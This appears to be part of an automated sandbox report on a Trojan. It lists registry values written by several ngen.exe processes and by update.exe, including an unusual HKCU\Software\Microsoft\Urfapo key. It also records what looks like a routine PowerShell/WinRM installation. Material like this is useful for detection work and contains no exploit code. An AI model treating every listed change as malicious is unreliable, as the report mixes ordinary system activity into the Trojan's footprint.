[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 A4 9C 3E 6D 8F EF 95 1D E9 A2 29 29 14 CD 31"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 36 3F 03 CA D9 49 27 40 EC 1E 2A 3E ED 88 44"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 06 AE E1 A2 9A 6F 17 80 7E CC A6 C6 71 8C 02"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA BF 7F 74 13 7A 0E 30 EE C9 E7 3C 1F 4B 7E 7B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 60 25 1D 59 3F 5B A2 71 C0 34 E4 A8 40 77 57"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 91 A1 4B 8E AF C1 5E F3 AF FA 92 92 7F EC 6A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:1868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 00 E6 A9 17 31 9E D1 C0 2B A6 B3 D9 54 7C C9"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 00 5B A4 3B 3B 6C 41 92 DB A0 1E EA 8D 9B 22"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 22 E0 FD 15 DA 56 7A 9F CB 8A 7B 9B F4 FD 91"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 75 E2 45 15 39 DA 4E 54 AA 43 CC 21 47 F4 18"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 03 D2 02 EC DC 5E F3 2A B2 2C BA D5 8E 28 53"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 A1 B5 D3 FB 93 58 64 35 9C 44 41 34 0D 19 41"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 87 E0 CA 67 5F 96 A0 E1 59 68 FE 09 42 DB C7"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE FE FD 38 57 45 58 6C 2F E3 28 00 11 68 56 4A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 57 E3 32 38 3D DB 9A 85 31 57 BA 83 6E 1D 1F"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C F5 C4 7C 9E A7 9B C2 5B A5 7B 45 F9 0E CC A1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process update.exe:4040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

